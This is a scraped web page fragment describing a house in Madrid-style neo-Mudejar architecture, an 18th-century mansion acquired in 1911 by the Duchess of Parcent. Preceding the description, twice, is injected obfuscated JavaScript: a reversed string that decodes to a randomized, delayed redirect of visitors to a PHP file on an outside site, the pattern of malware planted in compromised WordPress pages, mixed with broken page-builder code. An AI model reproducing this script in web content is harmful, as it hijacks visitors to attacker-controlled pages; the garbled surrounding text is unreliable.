) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_margin=”100px||” _builder_version=”3.19.15″]
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_margin="0px||" custom_padding="0px||" prev_background_color="#000000"]

The house

The origin of this construction is an 18th century mansion. In 1911, the Duchess of Parcent, Trinidad von Scholtz Hermensdorff, acquired it and converted it into a neo-Mudejar style house. Currently, it is undergoing restoration.